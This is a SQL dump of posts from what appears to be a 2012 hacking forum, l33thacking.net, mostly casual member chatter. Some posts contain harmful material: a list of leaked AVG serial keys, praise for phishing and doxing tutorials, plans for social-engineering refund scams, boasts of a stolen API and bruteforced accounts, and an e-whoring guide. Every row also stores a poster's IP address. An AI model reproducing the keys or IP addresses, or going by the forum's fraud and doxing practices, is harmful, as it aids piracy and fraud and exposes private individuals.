'0'); INSERT INTO mybb_posts VALUES('3694', '706', '3633', '4', 'RE: Supppp', '0', '9', 'p420', '1349552497', 'Welcome Kasual,\n\nIf you have any questions feel free to check out the help documents.\nhttp://l33thacking.net/misc.php?action=help', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd98d35ea13ee1008397026b0aaf74c21', '0', '0'); INSERT INTO mybb_posts VALUES('3695', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '9', 'p420', '1349552551', 'Nice giveaway but how do we use it i typed my username but didn\'t work.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd92e1b053c61b958a1505c5aa4a3e752', '0', '0'); INSERT INTO mybb_posts VALUES('3696', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '9', 'p420', '1349552582', 'Never played minecraft but seen some people play it.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '6a580ca40abf998fe7150d18d6b28590', '0', '0'); INSERT INTO mybb_posts VALUES('3697', '700', '3572', '7', 'RE: I\'m thirsty....what\'s your favorite drinks?', '0', '9', 'p420', '1349552825', 'I vouch for Water and Milo :D', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2188ef03fec34c06c9e5ba211308a7e6', '0', '0'); INSERT INTO mybb_posts VALUES('3698', '310', '3688', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '9', 'p420', '1349552859', '[quote=\'Graycat\' pid=\'3688\' dateline=\'1349551597\']\r\nseems like a fun task to do with a open wifi hotspot for the neighbors stealing wifi.\r\n[/quote]\r\n\r\nHotspot shield is the worst VPN to use to change your grades.\r\n\r\nTry \r\n\r\nhttp://l33thacking.net/thread-647.html\r\n\r\nOR\r\n\r\nhttp://l33thacking.net/thread-123.html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c2af52dcd71b0906e2bf6bf2a3486851', '0', '0'); INSERT INTO mybb_posts VALUES('3699', '731', '0', '3', 'PIDs for normal or upgraded?', '0', '9', 'p420', '1349552972', 'I have heard that the upgraded members can access the serials forum and Fake receipt creation section. Now from what I have been told that we are allowed to post PIDs in the public section so why do we have a private section for upgraded members then?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c82061a1ebf57975d160765f573e46c0', '0', '0'); INSERT INTO mybb_posts VALUES('3701', '446', '2058', '28', 'RE: This forum is dead..', '0', '82', 'iTzIpod', '1349553268', 'But still traffic is still traffic. \n\n\nIf we get a lot of traffic, it still helps advertise LH. Real or Not..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '689304c487111d8a8667f8bf41e270a0', '0', '0'); INSERT INTO mybb_posts VALUES('3702', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '82', 'iTzIpod', '1349553307', 'Those look better. ^ Nice idea. Would be great.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0780c090e0dfd55f5b7e668dffe9e0cb', '0', '0'); INSERT INTO mybb_posts VALUES('3703', '704', '3616', '66', 'RE: Minecraft Accounts', '0', '82', 'iTzIpod', '1349553338', 'Does that \"p\" stand for post? You didn\'t PM me.. :/\n\n\n\nLol\n\nThat post was so HQ. \nLike Oh Mah God.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89242c31112ee8b22a18436218caf31d', '0', '0'); INSERT INTO mybb_posts VALUES('3704', '691', '3517', '3', 'RE: Gaming Section Released', '0', '82', 'iTzIpod', '1349553386', 'Probably when the forum has more active members. And is succeeding', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f67dea88b1ba265be04391e13747333c', '0', '0'); INSERT INTO mybb_posts VALUES('3706', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '82', 'iTzIpod', '1349553461', 'It\'s a CloudFlare Resolver not a Skype ID Resolver. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '42d55c8adc1a3c9595ec7da3830694c7', '0', '0'); INSERT INTO mybb_posts VALUES('3707', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1349553492', 'Do you want to play it though? I can hook you up with an account. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '631042f4b5609709f99185890a50768a', '0', '0'); INSERT INTO mybb_posts VALUES('3708', '637', '3548', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349554068', '[quote=\'flamingworm\' pid=\'3548\' dateline=\'1349495232\']\r\nDo you still need this..I might be able to help you out :D\r\n[/quote]\r\n\r\nyeah I do bro.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1617d3caee1fded6abb6da13a0e91fb4', '0', '0'); INSERT INTO mybb_posts VALUES('3709', '732', '0', '7', 'Congratz iTzIpod', '0', '5', 'Timmy', '1349555063', 'iTzIpod finally reached 1K post. Congratz man and thanks for contributing. Now calm down a little bit :cool:', '173.245.64.232', '-1376435992', '1', '0', '0', '0', '1', 'c37c9947f51c4a946d4aa290fa2abbeb', '0', '0'); INSERT INTO mybb_posts VALUES('3710', '718', '3645', '16', 'RE: Apple Cookie Case', '0', '5', 'Timmy', '1349555303', 'What kind of excuse should we use any hints?', '173.245.64.232', '-1376435992', '1', '0', '0', '0', '1', '4c4e600576f4819a90a0c859e0aa308e', '0', '0'); INSERT INTO mybb_posts VALUES('3711', '691', '3517', '3', 'RE: Gaming Section Released', '0', '5', 'Timmy', '1349555395', 'i Think Jok3r will add when LH gets more active members.', '173.245.64.232', '-1376435992', '1', '0', '0', '0', '1', 'c192f2e0ed77c728212336d5480ed780', '0', '0'); INSERT INTO mybb_posts VALUES('3712', '733', '0', '19', '[Junk]Who is [removed] out here?', '0', '1', 't3h jok3r', '1349556171', 'If your name is [removed] please PM me ASAP otherwise I will have to go through your FB profile.\r\n\r\nI will junk this thread after I find out who Logan is. \r\n\r\nAlso who lives in Ontario Canada?', '72.231.24.165', '1223104677', '1', '0', '1', '1349570005', '1', '035c59fb8db7cbfe191661cbee5ca108', '0', '1349570005'); INSERT INTO mybb_posts VALUES('3713', '117', '3552', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '53', 'sirchamp', '1349557934', '[quote=\'flamingworm\' pid=\'3552\' dateline=\'1349495686\']\nLol iv\'e seen a much simpler version of this tut on HF....:facepalm:. Your version seems a little too complex...\n[/quote]\n\nHmm How should there be anything simpler than that? Make a website upload the php files and finito. This is the only way I know^^', '188.155.56.90', '-1130678182', '1', '0', '53', '1349765266', '1', '313e15a85cc9904877f98e88e28d1013', '0', '1349765266'); INSERT INTO mybb_posts VALUES('3714', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '100', '??zg???g????61', '1349558549', 'Holy shit already?! Nice ipod ahahhahaha', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '33a3836a4c92d02cc8c946d0cc018542', '0', '0'); INSERT INTO mybb_posts VALUES('3715', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '3', '??????????¢™', '1349558554', 'Congratz iTxIpod, keep it up.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c2c3408d6b17e65bd36e2de7bfd55e4a', '0', '0'); INSERT INTO mybb_posts VALUES('3736', '730', '3677', '72', 'RE: Need for Speed Most Wanted limited edition', '0', '61', 'NXK', '1349586704', 'I am for sure, I loved the original.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '925fd63cf2db5727be69e1f40462042e', '0', '0'); INSERT INTO mybb_posts VALUES('3717', '733', '3712', '19', 'RE: Who is Logan Turner out here?', '0', '222', 'Exposé', '1349558613', 'Is there a reason your going through someone\'s facebook profile? (btw im not Logan Turner lol)', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'df35749c22e80ed891ebb3f9d041d90f', '0', '0'); INSERT INTO mybb_posts VALUES('3718', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '222', 'Exposé', '1349558652', 'Da fuq....lol he does post alot tho so yeh. Anyway\'s congrats :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9b8c48360eb85e4d0b915f36f2e0577e', '0', '0'); INSERT INTO mybb_posts VALUES('3719', '733', '3712', '19', '[Junk]Who is Logan Turner out here?', '0', '61', 'NXK', '1349559741', 'This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('3720', '660', '3300', '30', 'RE: Vulcan Private Logger', '0', '100', '??zg???g????61', '1349561397', 'Ohhh nice! thanks for the share buddy :)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2a3b7562f92916a0eaf68996f71a5c92', '0', '0'); INSERT INTO mybb_posts VALUES('3721', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '82', 'iTzIpod', '1349561858', 'Woah. I got 1,000+ posts? :o Never noticed that..\n\n\nThanks everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2ff8d7656266ab19c497d1a723c619f', '0', '0'); INSERT INTO mybb_posts VALUES('3722', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '205', 'mothered', '1349562002', 'An amazing 21 posts per day on average, with around 27% of total posts.\r\n\r\nWell done mate, congratz :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '01daf2680b8b36ae940b879ea0882abf', '0', '0'); INSERT INTO mybb_posts VALUES('3723', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '205', 'mothered', '1349562144', 'Seems like a handy little tool Indeed.\r\n\r\nCheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd45d29b4c407ec8ab3b63377109b6731', '0', '0'); INSERT INTO mybb_posts VALUES('3724', '691', '3517', '3', 'RE: Gaming Section Released', '0', '205', 'mothered', '1349562423', 'The Gaming sector, Is quite popular on forums, so I assume this should take off rather well.\r\n\r\nNice move :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '969c993096b447db1a70f905a38ede35', '0', '0'); INSERT INTO mybb_posts VALUES('3725', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '205', 'mothered', '1349562596', 'I used to play It now and again a few years ago, when I was bruteforcing premium accounts.\r\n\r\nI really enjoyed It, but don\'t have the time for It at the moment.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a3d583ffa653fd2b851e759441fa09f3', '0', '0'); INSERT INTO mybb_posts VALUES('3726', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '205', 'mothered', '1349562730', 'I\'d also like to know what this Is about.\r\n\r\nGoogle seems to provide mixed results.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9a1dcfdedd5debed717ba3ab69dbd41f', '0', '0'); INSERT INTO mybb_posts VALUES('3727', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '222', 'Exposé', '1349562875', 'I don\'t think the name should determine the group. We are an elite group on LH that posts HQ and are active :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '46058d10dd05f1ff227d291b7ea5e3fc', '0', '0'); INSERT INTO mybb_posts VALUES('3728', '727', '3654', '35', 'RE: Rate My Thread Design + Download', '0', '205', 'mothered', '1349563047', 'The \"Buy Now\" part of It looks great. The rest may need a little work.\r\n\r\nJust my opinion :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0cc5c681085f66877fb665e65ca0abeb', '0', '0'); INSERT INTO mybb_posts VALUES('3729', '732', '3709', '7', 'RE: Congratz iTzIpod', '0', '82', 'iTzIpod', '1349567466', 'Thanks mothered. :D Time for 2k posts :3 Nah I joke.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b831b0476b96f7a55286ccadb3196a2e', '0', '0'); INSERT INTO mybb_posts VALUES('3730', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1349567725', 'Well. Unique is kinda basically that itself.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e806ffe65053467a923a8299266929e', '0', '0'); INSERT INTO mybb_posts VALUES('3731', '731', '3699', '3', 'RE: PIDs for normal or upgraded?', '0', '1', 't3h jok3r', '1349570198', 'PID generators etc can be distributed in the public forums and in the PIDs forum only PIDs (AKA Serials) are posted. In the PIDs section there is not only PIDs for SEing but PIDs for programs and more.', '24.193.21.206', '415307214', '1', '0', '0', '0', '1', '2a35a59a595daeae7e158dd2197bc071', '0', '0'); INSERT INTO mybb_posts VALUES('3732', '212', '3727', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1349573334', '[quote=\'flamingworm\' pid=\'3727\' dateline=\'1349562875\']\r\nI don\'t think the name should determine the group. We are an elite group on LH that posts HQ and are active :D\r\n[/quote]\r\n\r\nActually no, Elite group is a upgrade group that has to be purchased.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '02102b23aaf17017a93f3065e528250d', '0', '0'); INSERT INTO mybb_posts VALUES('3737', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '61', 'NXK', '1349586749', 'It\'s probably for minecraft.\n\nBut jesus OP atleast put some time into your threads..', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '601344afa9b2a1e42fb1a560f7416250', '0', '0'); INSERT INTO mybb_posts VALUES('3738', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '1', 't3h jok3r', '1349586811', 'Another thing, if you were unable to access LH and you received a message from Cloudflare saying you were banned then please PM me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b5b1c0d59e6f9cbf17a5df1af06f32f', '0', '0'); INSERT INTO mybb_posts VALUES('3739', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '205', 'mothered', '1349607094', 'Upon first logging In, I did notice the number of members went down.\r\n\r\nSo what exactly happened to give cause for Google to ban?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '52498ecef5f22d176078888d13f11c96', '0', '0'); INSERT INTO mybb_posts VALUES('3740', '715', '3642', '23', 'RE: Free HostGator Hosting! [N00B Friendly]', '0', '205', 'mothered', '1349607512', 'Going to definitely look Into this.\r\n\r\nMuch appreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'aa91ed53ffae4c2437e0627a06e8a8c6', '0', '0'); INSERT INTO mybb_posts VALUES('3741', '706', '3633', '4', 'RE: Supppp', '0', '205', 'mothered', '1349607608', 'Quite an Impressive Introduction you have there mate.\r\n\r\nWelcome aboard, and enjoy your stay.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '733455a74470184aec2100669f7630b9', '0', '0'); INSERT INTO mybb_posts VALUES('3742', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '214', 'Rave™', '1349608251', 'I\'m sorry I thought you were aware, it\'s like a hacking client for minecraft. I coded it.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'ceee636d77bddc116b7bf0580d5a7546', '0', '0'); INSERT INTO mybb_posts VALUES('3743', '718', '3645', '16', 'RE: Apple Cookie Case', '0', '214', 'Rave™', '1349608471', 'Something like this case was ripped or damaged or doesnt fit properly.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'd5328e3521015a9f08d8f9262b64f5a0', '0', '0'); INSERT INTO mybb_posts VALUES('3744', '736', '0', '7', 'Should I make a l33thacking Skype resolver?', '0', '214', 'Rave™', '1349608570', 'Guys do you think I should, I would need to steal an API but I can do it.;)', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '0ff1369c8238f76f98aa2b97546daa15', '0', '0'); INSERT INTO mybb_posts VALUES('3745', '698', '3557', '7', 'RE: Skype group anyone?', '0', '214', 'Rave™', '1349608617', 'I would love to be a part\nAdd me or I\'ll add you\nspushkin1', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '489fad50aea1b5dbf93723d48f65f68e', '0', '0'); INSERT INTO mybb_posts VALUES('3746', '737', '0', '7', 'Just voted', '6', '214', 'Rave™', '1349608733', 'Just voted, we are gonna be at the top one day. Hackforums is garbage with a fag like omni in charge, leakforums or boring, ubers is dead, I see an opening for us.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '64c57e173d436d9456aa36e4d1319103', '0', '0'); INSERT INTO mybb_posts VALUES('3747', '637', '3098', '16', 'RE: I need to SE a gaming keyboard', '0', '214', 'Rave™', '1349608899', 'I can do this tommorow, add me on Skype\nspushkin1', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '91e947c433a1fd10d8cf19dba9301d71', '0', '0'); INSERT INTO mybb_posts VALUES('3748', '637', '3747', '16', 'RE: I need to SE a gaming keyboard', '0', '62', 'R?????zo?', '1349609441', '[quote=\'Kasual\' pid=\'3747\' dateline=\'1349608899\']\r\nI can do this tommorow, add me on Skype\r\nspushkin1\r\n[/quote]\r\n\r\nadded you.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a014b8d694cb5e52a852b026bbdd1726', '0', '0'); INSERT INTO mybb_posts VALUES('3749', '737', '3746', '7', 'RE: Just voted', '0', '53', 'sirchamp', '1349612943', 'Hf isnt garbage. Its full of trolls tough', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '5d8c1931aea549159e2a7de45b579bf0', '0', '0'); INSERT INTO mybb_posts VALUES('3750', '214', '856', '52', 'RE: [tut] Creating a IPod PID Generator', '0', '214', 'Rave™', '1349613260', 'Can someone help me with this?', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '7cef0ff2a2df419fda2b02c22ccd5f11', '0', '0'); INSERT INTO mybb_posts VALUES('3751', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '100', '??zg???g????61', '1349613864', 'You coded it? Cool ill download this now.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8c9ce371c7146affb8429c4bf3e54e21', '0', '0'); INSERT INTO mybb_posts VALUES('3752', '718', '3645', '16', 'RE: Apple Cookie Case', '0', '100', '??zg???g????61', '1349613997', 'Thanks ill try this later', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '05e2e1148d1309ae1bf37ea13cce5f1c', '0', '0'); INSERT INTO mybb_posts VALUES('3753', '734', '3733', '3', 'RE: Downtime, PMs and Members', '0', '100', '??zg???g????61', '1349614110', 'Traffic bots fuuuuuck :( this is a sad day for LH', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd7f1cb5a635ad860dffbb4002938ecc7', '0', '0'); INSERT INTO mybb_posts VALUES('3754', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '100', '??zg???g????61', '1349614418', 'Awww shit thanks..! I need a good CF resolver. For those of you that dont know how this works, its for resolving the IP of cloudflare protected websites.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '6962050f620cc9e8f6f4455f089335bc', '0', '0'); INSERT INTO mybb_posts VALUES('3755', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '100', '??zg???g????61', '1349614492', 'Go for it! Make it web based(;', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a5567179ef629facd716162ad8017c23', '0', '0'); INSERT INTO mybb_posts VALUES('3756', '705', '3617', '61', 'RE: Minecraft Accounts', '0', '100', '??zg???g????61', '1349614930', 'Hey ipod hmu with some of these', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'b3c0c8606f254bccef756765373da07a', '0', '0'); INSERT INTO mybb_posts VALUES('3757', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '214', 'Rave™', '1349615389', 'Just stole an API. Working on a nice source right now.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', 'e71e547671f28c0c55d0e09a7c5cef37', '0', '0'); INSERT INTO mybb_posts VALUES('3758', '50', '132', '12', 'RE: [tut]How to DOX', '0', '100', '??zg???g????61', '1349616153', 'Awesome, this is going to be useful in the future.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '980d374339e2ac59a70fea398dc65473', '0', '0'); INSERT INTO mybb_posts VALUES('3759', '655', '3253', '43', 'RE: ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '100', '??zg???g????61', '1349616231', 'Suit yourself ;) with keys its much less of a hassle. I think you get updates as well.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '3825f960a50c751bcdcaf1d5559f7eda', '0', '0'); INSERT INTO mybb_posts VALUES('3760', '738', '0', '43', '[LEAK] AVG 2013 Serial Keys', '0', '100', '??zg???g????61', '1349616554', 'Here they are ;D\r\n\r\n8MEH-RF4BZ-FHATO-VRV3A-47LOJ-DEMBR-ACED\r\n8MEH-R6BFE-HWUHF-DPNDA-VXECY-2EMBR-ACED\r\n8MEH-RTN2Z-UDLMK-6RWGA-AJPK7-VEMBR-ACED\r\n8MEH-R6O2P-VYKXS-BAYWR-CNCZX-WEMBR-ACED\r\n8MEH-R9Q3V-ZHN2T-92KCR-AHE9W-YEMBR-ACED\r\n8MEH-RAJC2-O3P77-KRRQA-HFTKK-REMBR-ACED\r\n8MEH-RPDWL-THRLY-O8Z3R-4R3YG-4EMBR-ACED\r\n8MEH-RTW3W-YQLQ3-KUK8A-RQNV9-OEMBR-ACED\r\n\r\nEnjoy!', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '4e41f9554b42a6dc0583ba48832e35dd', '0', '0'); INSERT INTO mybb_posts VALUES('3761', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '100', '??zg???g????61', '1349616844', 'Awesome :D btw your signature is broken.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '07c12a1c43d91a91b065ef9e926653b9', '0', '0'); INSERT INTO mybb_posts VALUES('3762', '739', '0', '59', '? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '213', 'BitMonst3r', '1349616888', '[img]http://i.imgur.com/8i8N1.jpg[/img]\r\n\r\nDownload: \r\n[code]\r\nhttp://adf.ly/D25TJ\r\n[/code]\r\nPassword \r\n[code]\r\n-!Be@#)8The928Only_-+One7`~Who~#@17}WIN!0ºÃа§®°‘†‡}\r\n[/code]\r\n[img]http://img194.imageshack.us/img194/9834/pleasesaythanks.png[/img]', '62.212.207.52', '1054134068', '0', '0', '0', '0', '1', 'a1be87d37adb67c5d3b04e6d97d00e23', '0', '0'); INSERT INTO mybb_posts VALUES('3763', '740', '0', '3', 'I am only one who gets this error?', '0', '213', 'BitMonst3r', '1349617212', 'I am only one who gets this error?\r\n[spoiler]\r\n[img]http://imageshack.us/a/img689/4365/erorrq.png[/img]\r\n[/spoiler]', '62.212.207.52', '1054134068', '0', '0', '0', '0', '1', '3ca8e11d9c4fb550f0992ae99b5ce007', '0', '0'); INSERT INTO mybb_posts VALUES('3764', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '53', 'sirchamp', '1349617322', 'Username: Sirchamp\nAge: 17\nProfile: http://l33thacking.net/user-53.html\nInfo: I play mainly games for the computer. I game about 1h a day. I play cod2, cod6, cod7, skyrim, oblivion, fifa12 and minecraft', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f4625cedf1bc1b5ef3da97b6e0a07fd0', '0', '0'); INSERT INTO mybb_posts VALUES('3765', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '213', 'BitMonst3r', '1349618716', 'Hmm looks like this is good forum. I will check it out.', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', '8f45d04a81d8f2601a4233e674b0b464', '0', '0'); INSERT INTO mybb_posts VALUES('3766', '741', '0', '9', '7 Videos That Will Show You How To Make Real Income Online!', '0', '213', 'BitMonst3r', '1349618884', '[align=center]\r\n[color=#1E90FF][size=x-large][b]7 Videos That Will Show You How To Make Real Income Online! [/b][/size][/color]\r\n\r\n[size=medium][b]TE Profits Part 1. Welcome[/b][/size]\r\n[video=youtube]http://www.youtube.com/watch?v=ZYolRKPIGes[/video]\r\n\r\n[size=medium][b]TE Profits Part 2. More Traffic with Less Surfing[/b][/size] \r\n[video=youtube]http://www.youtube.com/watch?v=y_79V9MIF_I[/video]\r\n\r\n[size=medium][b]TE Profits Part 3. TECP[/b][/size]\r\n[video=youtube]http://www.youtube.com/watch?v=JLbFgRmF1M4[/video]\r\n\r\n[size=medium][b]TE Profits Part 4. Active Downlines[/b][/size]\r\n[video=youtube]http://www.youtube.com/watch?v=edQkUHj7kBI[/video]\r\n\r\n[size=medium][b]TE Profits Part 5. Turning Your Traffic Into Cash[/b][/size]\r\n[video=youtube]http://www.youtube.com/watch?v=-VBjDiBOmfQ[/video]\r\n\r\n[size=medium][b]TE Profits Part 6. Setting up YourSurfBiz[/b][/size]\r\n[video=youtube]http://www.youtube.com/watch?v=xtO9eKB4eT8[/video]\r\n\r\n[size=medium][b]TE Profits Part 7. Residual Income with TEs[/b][/size]\r\n[video=youtube]http://www.youtube.com/watch?v=fSib--myLM4[/video]\r\n\r\n[size=large][b]Register For More Information And Tools![/b][/size] [size=large][b][color=#FF6347]Its 100% FREE[/color][/b][/size]\r\n[size=large][b][url=http://goo.gl/bAA7D]CLICK HERE TO REGISTER [/url][/b][/size]\r\n\r\n[b]Don\'t Understand something? Need help? Post here or pm me and i will help you.\r\n[/b]\r\n\r\n[b]Payment Proof[/b]\r\n[img]http://imageshack.us/a/img228/1756/paymenti.png[/img]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n[/align]', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', 'e80cd2755742d6a30584fa0e81b45d01', '0', '0'); INSERT INTO mybb_posts VALUES('3767', '740', '3763', '3', 'RE: I am only one who gets this error?', '0', '243', 'Anarchy $ucks', '1349619199', 'no you mad bro??!?!\ndon\'t be so mad', '97.252.43.115', '1643916147', '0', '0', '0', '0', '1', 'c7202ad0ca2a63fd1921bffb6f5e2442', '0', '0'); INSERT INTO mybb_posts VALUES('3768', '739', '3762', '59', 'RE: ? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '100', '??zg???g????61', '1349619202', 'Nobody is going to buy an eWhoring guide.. -_-', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'd6b136dc35323782c79e6124985cb58d', '0', '0'); INSERT INTO mybb_posts VALUES('3769', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '100', '??zg???g????61', '1349619274', 'Hey cool share bro, I\'d LOVE this link. I\'ve been looking for a spreading eBook. Thanks.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2aa1a98e58ced4137e8f455eea6a0181', '0', '0'); INSERT INTO mybb_posts VALUES('3782', '736', '3744', '7', 'RE: Should I make a l33thacking Skype resolver?', '0', '82', 'iTzIpod', '1349621168', 'Go for it. I\'ll use it (: If I find out that bully\'s skype, I\'ll be grateful.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ccdf7326fdc8feaad88332062e90b43', '0', '0'); INSERT INTO mybb_posts VALUES('3771', '742', '0', '59', 'The Code Book: How to Make It, Break It, Hack It, Crack It', '0', '213', 'BitMonst3r', '1349619405', '[align=center][img]http://pixhost.me/avaxhome/80/f9/0021f980_medium.jpeg[/img]\r\n[size=x-large][b][url=http://adf.ly/DUg3x]Sales Page[/url][/b][/size]\r\n\r\n[size=x-large][b][url=http://adf.ly/DUfyu]Download[/url][/b][/size]\r\n[img]http://img194.imageshack.us/img194/9834/pleasesaythanks.png[/img][/align]', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', '1a9249b49d600cf362ee9632363468bd', '0', '0'); INSERT INTO mybb_posts VALUES('3772', '739', '3762', '59', 'RE: ? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '213', 'BitMonst3r', '1349619460', 'Dude you miss understood. Its free to download', '62.212.204.139', '1054133387', '0', '0', '0', '0', '1', 'f87a9c22d47cc5c6c056510a657e90c1', '0', '0'); INSERT INTO mybb_posts VALUES('3773', '735', '3735', '59', 'RE: Ultimate Bitcoin Guide! Earn for playing games & More!', '0', '82', 'iTzIpod', '1349620489', 'Nice guide. Don\'t really know what BitCoins are though. But I heard of it a couple of times.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd3b7215e8ba1a51fd046c68b68ccb0d2', '0', '0'); INSERT INTO mybb_posts VALUES('3774', '698', '3557', '7', 'RE: Skype group anyone?', '0', '82', 'iTzIpod', '1349620590', 'Can you add me ^? Add my Skype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '185768bb0ee86962bc40be70d034f3aa', '0', '0'); INSERT INTO mybb_posts VALUES('3775', '737', '3746', '7', 'RE: Just voted', '0', '82', 'iTzIpod', '1349620663', 'HF is full of trolls, noobs, leechers, leakers, repfuckers, gays, and bronies. \nLF is alright. I kinda like it there. \nUbers, meh. Don\'t care about it. Only registered 4 days ago or something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'daaf4227dc0dddcdb7c212786b9ac7d0', '0', '0'); INSERT INTO mybb_posts VALUES('3776', '724', '3651', '74', 'RE: Cheese Cake Client', '0', '82', 'iTzIpod', '1349620695', 'What does it do?\n\nAny previews of it?\nAny virus scans just in case?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4a334722f0c27dec97d84d12e3a12ec3', '0', '0'); INSERT INTO mybb_posts VALUES('3777', '725', '3652', '7', 'RE: L33THacking Cloudflare Resolver!', '0', '82', 'iTzIpod', '1349620732', 'So I just enter in the URL of a website that contains a CloudFlare protection page thing?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa35f274caaae6d0294ee5dbd377399f', '0', '0'); INSERT INTO mybb_posts VALUES('3778', '705', '3617', '61', 'RE: Minecraft Accounts', '0', '82', 'iTzIpod', '1349620761', 'Aright. I\'ll PM you like 2 now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0a984cecdd7fffc7276106a41108855c', '0', '0'); INSERT INTO mybb_posts VALUES('3779', '50', '132', '12', 'RE: [tut]How to DOX', '0', '82', 'iTzIpod', '1349620882', 'Nice guide. I still want someone to dox that guy though. 